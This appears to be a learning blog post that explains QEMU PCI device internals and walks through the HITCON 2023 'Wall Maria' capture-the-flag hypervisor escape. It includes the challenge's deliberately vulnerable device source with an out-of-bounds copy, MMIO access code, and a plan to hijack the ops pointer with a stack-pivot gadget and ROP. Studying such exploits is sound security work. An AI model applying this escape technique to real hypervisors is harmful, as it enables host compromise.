# QEMU learning
## What is QEMU?
QEMU (short for Quick Emulator) is an open-source emulator. It can interoperate with KVM (Kernel-based Virtual Machine) for hardware-accelerated virtualization, and it can also run applications compiled for one architecture (e.g. arm) on another architecture (e.g. x86_64).
## Setup QEMU
Download
```bash
wget https://download.qemu.org/qemu-8.0.2.tar.xz
```
Install dependencies
```bash
sudo pip3 install ninja
sudo apt install libglib2.0-dev libgcrypt20-dev zlib1g-dev autoconf automake libtool bison flex libpixman-1-dev
```
Build
```shell
cd qemu-8.0.2
./configure --enable-debug && cd build && make -j`nproc`
```
## PCI devices
Learn how to build a custom PCI device:
https://www.youtube.com/watch?v=MTUuymrutNw
```sh
./qemu-system-x86_64 -device help | grep "PCI"
name "cxl-downstream", bus PCI, desc "CXL Switch Downstream Port"
name "cxl-rp", bus PCI, desc "CXL Root Port"
name "cxl-upstream", bus PCI, desc "CXL Switch Upstream Port"
name "i82801b11-bridge", bus PCI
name "ioh3420", bus PCI, desc "Intel IOH device id 3420 PCIE Root Port"
name "pci-bridge", bus PCI, desc "Standard PCI Bridge"
name "pci-bridge-seat", bus PCI, desc "Standard PCI Bridge (multiseat)"
name "pcie-pci-bridge", bus PCI
name "pcie-root-port", bus PCI, desc "PCI Express Root Port"
name "pxb", bus PCI, desc "PCI Expander Bridge"
name "pxb-cxl", bus PCI, desc "CXL Host Bridge"
name "pxb-pcie", bus PCI, desc "PCI Express Expander Bridge"
name "vfio-pci-igd-lpc-bridge", bus PCI, desc "VFIO dummy ISA/LPC bridge for IGD assignment"
name "x3130-upstream", bus PCI, desc "TI X3130 Upstream Port of PCI Express Switch"
name "xio3130-downstream", bus PCI, desc "TI X3130 Downstream Port of PCI Express Switch"
name "ich9-usb-ehci1", bus PCI
name "ich9-usb-ehci2", bus PCI
name "ich9-usb-uhci1", bus PCI
name "ich9-usb-uhci2", bus PCI
name "ich9-usb-uhci3", bus PCI
name "ich9-usb-uhci4", bus PCI
name "ich9-usb-uhci5", bus PCI
name "ich9-usb-uhci6", bus PCI
name "nec-usb-xhci", bus PCI
name "pci-ohci", bus PCI, desc "Apple USB Controller"
name "piix3-usb-uhci", bus PCI
name "piix4-usb-uhci", bus PCI
name "qemu-xhci", bus PCI
name "usb-ehci", bus PCI
name "am53c974", bus PCI, desc "AMD Am53c974 PCscsi-PCI SCSI adapter"
name "cxl-type3", bus PCI, desc "CXL PMEM Device (Type 3)"
name "dc390", bus PCI, desc "Tekram DC-390 SCSI adapter"
name "ich9-ahci", bus PCI, alias "ahci"
name "lsi53c810", bus PCI
name "lsi53c895a", bus PCI, alias "lsi"
name "megasas", bus PCI, desc "LSI MegaRAID SAS 1078"
name "megasas-gen2", bus PCI, desc "LSI MegaRAID SAS 2108"
name "mptsas1068", bus PCI, desc "LSI SAS 1068"
name "nvme", bus PCI, desc "Non-Volatile Memory Express"
name "piix3-ide", bus PCI
name "piix4-ide", bus PCI
name "pvscsi", bus PCI
name "sdhci-pci", bus PCI
name "vhost-scsi-pci", bus PCI
name "vhost-scsi-pci-non-transitional", bus PCI
name "vhost-scsi-pci-transitional", bus PCI
name "vhost-user-blk-pci", bus PCI
name "vhost-user-blk-pci-non-transitional", bus PCI
name "vhost-user-blk-pci-transitional", bus PCI
name "vhost-user-fs-pci", bus PCI
name "vhost-user-scsi-pci", bus PCI
name "vhost-user-scsi-pci-non-transitional", bus PCI
name "vhost-user-scsi-pci-transitional", bus PCI
```
Checking the devices available in a given qemu binary, we can see lots of PCI devices.
If you need additional information, check [PCI](https://en.wikipedia.org/wiki/Conventional_PCI)
Basically, PCI is a local bus that attaches hardware devices to the machine; in a hypervisor, PCI devices are how new features are exposed to the guest.
We can interact with PCI devices using 2 methods:
- MMIO (Memory-mapped I/O)
- PMIO (Port-mapped I/O)
With MMIO, ordinary memory instructions like `mov` communicate with the device; with PMIO, the dedicated `in`/`out` instructions are used instead.
In my blog we will mainly use `MMIO` as a means of communication.
For example, `lspci` in a VMware guest lists the PCI devices present:
```sh
00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 01)
00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 01)
00:07.0 ISA bridge: Intel Corporation 82371AB/EB/MB PIIX4 ISA (rev 08)
00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01)
00:07.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 08)
00:07.7 System peripheral: VMware Virtual Machine Communication Interface (rev 10)
00:0f.0 VGA compatible controller: VMware SVGA II Adapter
00:10.0 SCSI storage controller: Broadcom / LSI 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 01)
00:11.0 PCI bridge: VMware PCI bridge (rev 02)
00:15.0 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.1 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.2 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.3 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.4 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.5 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.6 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.7 PCI bridge: VMware PCI Express Root Port (rev 01)
00:16.0 PCI bridge: VMware PCI Express Root Port (rev 01)
```
In many hypervisor escapes, whether in `QEMU`, `VMWare`, or `VirtualBox`, we principally take advantage of such PCI devices to achieve a guest-to-host escape.
## Memory API
https://www.qemu.org/docs/master/devel/memory.html
The `qemu` memory-mapped region is initialized using [memory_region_init_io](https://elixir.bootlin.com/qemu/v8.0.2/source/softmmu/memory.c#L1530).
`hwaddr` is the data type used for addresses in this physical address space, which is decomposed into pages.
https://android.googlesource.com/platform/external/qemu.git/+/master/docs/QEMU-MEMORY-MANAGEMENT.TXT
This is what allows qemu to dispatch I/O operations between guest and host in both directions.
## HITCON 2023 - Wall Maria
Check how qemu is launched; a few things are worth noting.
I modified `run.sh` slightly to run it locally:
```bash
#!/bin/bash
./qemu-system-x86_64 \
-L ./bios \
-kernel ./bzImage \
-initrd ./initramfs.cpio.gz \
-cpu kvm64,+smep,+smap \
-monitor none \
-m 1024M \
-monitor /dev/null \
-append "console=ttyS0 oops=panic panic=1 quiet nokpti nokaslr" \
-nographic \
-no-reboot \
-net user -net nic -device e1000 \
-device maria \
-enable-kvm \
-s
```
You should get familiar with debugging the Linux kernel first, since it is a fundamental background for understanding virtualization; check [this blog](https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/) to get started.
As with a Linux kernel exploit, we are given a bash script that boots a kernel emulated by `qemu`.
Again, some options that you should pay attention to:
- `-L ./bios` specifies the directory holding the `BIOS`, `VGA BIOS` and `keymap` files.
- `-initrd initramfs.cpio.gz` specifies the compressed initial RAM filesystem containing the root directory.
- `-enable-kvm` accelerates `QEMU` by using the host's `kvm` support.
- `-device maria` attaches the custom `maria` device to the virtual machine.
- `-s` makes `QEMU` listen for a gdb connection on TCP port 1234, in case we want to debug the kernel.
More information about KVM: if you want to enable KVM inside VMWare, configure the VM as in the following picture.

Then disable Hyper-V by running `bcdedit /set hypervisorlaunchtype off` in PowerShell with admin privileges, and reboot.
If you use WSL, you can enable `nested virtualization`; check [this site](https://serverfault.com/questions/1043441/how-to-run-kvm-nested-in-wsl2-or-vmware).
If successful, `/dev/kvm` will exist and you can use the command `kvm-ok` to check the status of kvm.

**Source code**
```c
#include "hw/hw.h"
#include "hw/pci/msi.h"
#include "hw/pci/pci.h"
#include "qapi/visitor.h"
#include "qemu/main-loop.h"
#include "qemu/module.h"
#include "qemu/osdep.h"
#include "qom/object.h"

#define TYPE_PCI_MARIA_DEVICE "maria"
#define MARIA_MMIO_SIZE 0x10000
#define BUFF_SIZE 0x2000

typedef struct {
    PCIDevice pdev;
    struct {
        uint64_t src;
        uint8_t off;
    } state;
    char buff[BUFF_SIZE];
    MemoryRegion mmio;
} MariaState;

DECLARE_INSTANCE_CHECKER(MariaState, MARIA, TYPE_PCI_MARIA_DEVICE)

static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    uint64_t val = 0;
    switch (addr) {
    case 0x00:
        cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1);
        val = 0x600DC0DE;
        break;
    case 0x04:
        val = maria->state.src;
        break;
    case 0x08:
        val = maria->state.off;
        break;
    default:
        val = 0xDEADC0DE;
        break;
    }
    return val;
}

static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    switch (addr) {
    case 0x00:
        cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0);
        break;
    case 0x04:
        maria->state.src = val;
        break;
    case 0x08:
        maria->state.off = val;
        break;
    default:
        break;
    }
}

static const MemoryRegionOps maria_mmio_ops = {
    .read = maria_mmio_read,
    .write = maria_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
    .impl = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

static void pci_maria_realize(PCIDevice *pdev, Error **errp) {
    MariaState *maria = MARIA(pdev);
    memory_region_init_io(&maria->mmio, OBJECT(maria), &maria_mmio_ops, maria, "maria-mmio", MARIA_MMIO_SIZE);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &maria->mmio);
}

static void maria_instance_init(Object *obj) {
    MariaState *maria = MARIA(obj);
    memset(&maria->state, 0, sizeof(maria->state));
    memset(maria->buff, 0, sizeof(maria->buff));
}

static void maria_class_init(ObjectClass *class, void *data) {
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);
    k->realize = pci_maria_realize;
    k->vendor_id = PCI_VENDOR_ID_QEMU;
    k->device_id = 0xDEAD;
    k->revision = 0x0;
    k->class_id = PCI_CLASS_OTHERS;
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

static void pci_maria_register_types(void) {
    static InterfaceInfo interfaces[] = {
        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
        { },
    };
    static const TypeInfo maria_info = {
        .name = TYPE_PCI_MARIA_DEVICE,
        .parent = TYPE_PCI_DEVICE,
        .instance_size = sizeof(MariaState),
        .instance_init = maria_instance_init,
        .class_init = maria_class_init,
        .interfaces = interfaces,
    };
    type_register_static(&maria_info);
}

type_init(pci_maria_register_types)
```
For qemu escape challenges, and for some CVEs related to `VirtualBox` and `VMWare`, the target is a vulnerable device compiled into the hypervisor: a VGA device, a network card, a disk controller, and so on.
A custom device called `maria` is implemented, so let's dig deeper and figure out the bug.

You can check the device `maria` by using `lspci` in the given kernel.

So which entry corresponds to the `maria` device?
Check these lines from its source code:
```c
k->vendor_id = PCI_VENDOR_ID_QEMU;
k->device_id = 0xDEAD;
```
That means the last line in the output is the `maria` device.

Information about the `maria` device is stored in the directory `/sys/devices/pci0000:00/0000:00:05.0`.

To interact with the device, we will focus on the files named `resourceX`, where X >= 0.

If we try to `cat` or `echo` these files directly, it fails. Instead of traditional file I/O, we can `mmap` these `sysfs` resources.
```c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

#define PAGE_SIZE 0x1000

uint8_t *mmio_mem;

void errExit(const char *msg) { perror(msg); exit(EXIT_FAILURE); }

uint32_t mmio_read(uint32_t addr) {
    return *(volatile uint32_t *)(mmio_mem + addr);
}

/* mmio_write is the counterpart used by later snippets (set_off, etc.) */
void mmio_write(uint32_t addr, uint32_t val) {
    *(volatile uint32_t *)(mmio_mem + addr) = val;
}

int main() {
    int fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
    if (fd < 0) {
        errExit("Open /sys/devices/pci0000:00/0000:00:05.0/resource0 failed");
    }
    mmio_mem = mmap(NULL, PAGE_SIZE * 4, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (mmio_mem == MAP_FAILED) {
        errExit("mmio");
    }
    mmio_read(0);
}
```
Why do we need the `O_SYNC` flag in `open`? It makes the mapping uncached: every load and store goes straight to the underlying device rather than being served from the CPU cache, so writes reach the hardware immediately and reads always return fresh data.
https://stackoverflow.com/questions/72115837/when-does-o-sync-have-an-effect
### BUG
```c
static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    uint64_t val = 0;
    switch (addr) {
    case 0x00:
        cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1);
        val = 0x600DC0DE;
        break;
    case 0x04:
        val = maria->state.src;
        break;
    case 0x08:
        val = maria->state.off;
        break;
    default:
        val = 0xDEADC0DE;
        break;
    }
    return val;
}

static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    switch (addr) {
    case 0x00:
        cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0);
        break;
    case 0x04:
        maria->state.src = val;
        break;
    case 0x08:
        maria->state.off = val;
        break;
    default:
        break;
    }
}
```
```c
typedef struct {
    PCIDevice pdev;
    struct {
        uint64_t src;
        uint8_t off;
    } state;
    char buff[BUFF_SIZE];
    MemoryRegion mmio;
} MariaState;
```
`cpu_physical_memory_rw` behaves like `memcpy`, but the direction of the copy depends on the 4th param (`is_write`): if it is set, data flows from the host buffer into guest memory, otherwise the other way around. Note that its first param is a guest *physical* address, while the second is an ordinary host pointer.
To know more about physical and virtual addresses, you can see [GVA and GPA](https://www.geeksforgeeks.org/memory-allocation-techniques-mapping-virtual-addresses-to-physical-addresses/).
Indeed, from the guest we cannot hand the device a virtual address; we must supply a guest physical address (`hwaddr`).
The 3rd param is fixed at `BUFF_SIZE`, the full size of `buff`, while the copy starts at `&maria->buff[maria->state.off]`. Setting `maria.off` to any non-zero value therefore makes the copy run past the end of `buff`: an `oob read/write` in both the `read` and `write` handlers.
**Note: we are exploiting a single userspace program, so being accustomed to pwning userland binaries is a prerequisite; we will also write the exploit in C, which is definitely harder than python.**
### OOB Read/Write
First, I want to confirm that I can hit the breakpoints in `maria_mmio_read` and `maria_mmio_write`.
```c
mmio_write(0x0, 0x0);
```

Breakpoint hit!
Let's check what we can leverage
```sh
pwndbg> ptype /o maria
type = struct {
/*     0   | 2592 */    PCIDevice pdev;
/*  2592   |   16 */    struct {
/*  2592   |    8 */        uint64_t src;
/*  2600   |    1 */        uint8_t off;
/* XXX  7-byte padding */

                            /* total size (bytes):   16 */
                        } state;
/*  2608   | 8192 */    char buff[8192];
/* 10800   |  272 */    MemoryRegion mmio;

                        /* total size (bytes): 11072 */
                      } *
```
#### OOB Read
The read handler copies `0x2000` bytes starting from `buff[off]`, so with a non-zero `off` the tail of the copy comes from past the end of `buff`, where the `MemoryRegion mmio` struct lives.
[MemoryRegion definition](https://elixir.bootlin.com/qemu/v8.0.2/source/include/exec/memory.h#L753)


The address highlighted in blue is a heap pointer into the `MariaState` struct, while the ones highlighted in red and white are addresses inside the qemu binary.
Leaking the qemu base address is easy, so let's find out how to write.
#### OOB Write
```c
static const MemoryRegionOps maria_mmio_ops = {
    .read = maria_mmio_read,
    .write = maria_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
    .impl = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};
```

As the `sandbox` option is enabled, `fork` and `execve` are blacklisted, so simply spawning a shell will not work.
`maria_mmio_ops` works like a vtable of function pointers: every access through the memory-mapped region is dispatched via these pointers.
So instead of letting qemu call those handlers, we replace the pointer with a `stack pivot` gadget.
Also, because `opaque` (a pointer to data we control) is held in `rax` at the moment qemu jumps into the handler, this gadget is a perfect fit:
```
0x00000000007bce54 : push rax ; pop rsp ; nop ; pop rbp ; ret
```
From here, we can build an `orw` payload, or `ROP` to `mprotect` and jump to our shellcode.
### Exploit
First, set the offset to 0xf0, then read the data behind `buff`:
```c
void set_off(uint32_t value) {
    mmio_write(0x08, value);
}

set_off(0xf0);
```
Then, set `src` to the physical address of a buffer we `mmap`ed, so the device will `read` from and `write` into memory we control.
To find the physical address of an arbitrary virtual address, open `/proc/self/pagemap` and `lseek` to the entry for that page:
https://www.kernel.org/doc/Documentation/vm/pagemap.txt
http://www.phrack.org/issues/70/5.html
### Another problem?
`char buff[0x2000]` is larger than a page, which is only 0x1000 bytes. A problem arises here: if we `mmap` a region of size `0x2000`, its two virtual pages will usually map to non-contiguous physical pages. Since the device copies to a single physical address range, our read buffer would be partly wrong.
**How to deal with this?** Looking at `/proc/meminfo`, the guest supports 2048 kB hugepages:
```
/root # cat /proc/meminfo
MemTotal: 992864 kB
MemFree: 897008 kB
MemAvailable: 892184 kB
Buffers: 0 kB
Cached: 72104 kB
SwapCached: 0 kB
Active: 11372 kB
Inactive: 61200 kB
Active(anon): 11372 kB
Inactive(anon): 61200 kB
Active(file): 0 kB
Inactive(file): 0 kB
Unevictable: 0 kB
Mlocked: 0 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
AnonPages: 492 kB
Mapped: 1908 kB
Shmem: 72104 kB
KReclaimable: 9328 kB
Slab: 15576 kB
SReclaimable: 9328 kB
SUnreclaim: 6248 kB
KernelStack: 732 kB
PageTables: 156 kB
SecPageTables: 0 kB
NFS_Unstable: 0 kB
Bounce: 0 kB
WritebackTmp: 0 kB
CommitLimit: 496432 kB
Committed_AS: 73608 kB
VmallocTotal: 34359738367 kB
VmallocUsed: 980 kB
VmallocChunk: 0 kB
Percpu: 228 kB
HugePages_Total: 0
HugePages_Free: 0
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 2048 kB
Hugetlb: 0 kB
DirectMap4k: 20352 kB
DirectMap2M: 1028096 kB
/root #
```
We have two options:
- Allocate multiple pages, then find the physical address of each one to check whether any of them are physically consecutive.
- Use hugepages.

Hugepages let the kernel back a mapping with a single large, physically contiguous block of memory.
https://infohub.delltechnologies.com/en-US/l/day-two-best-practices-10/red-hat-enterprise-linux-hugepages-2/
```bash
sysctl -w vm.nr_hugepages=40
```
This sets the number of hugepages reserved by the system.
After leaking, we overwrite `mmio_ops` and `opaque` with a pointer to our crafted vtable and our ROP chain, respectively.
**Before**

**After**



### Summary
A baby qemu escape challenge, and a good excuse to wade through a great amount of messy code. I learned a lot about how to interact with PCI devices and exploit them; hopefully I can grasp the networking and VGA card devices next.
## Reference
https://elixir.bootlin.com/qemu/v8.0.2/source
https://airbus-seclab.github.io/qemu_blog/pci.html
https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/03/kvm-mmio
https://www.qemu.org/docs/master/devel/memory.html
https://burgers.io/pci-access-without-a-driver
https://kb.vmware.com/s/article/2057914
https://www.kernel.org/doc/Documentation/vm/pagemap.txt
http://www.phrack.org/issues/70/5.html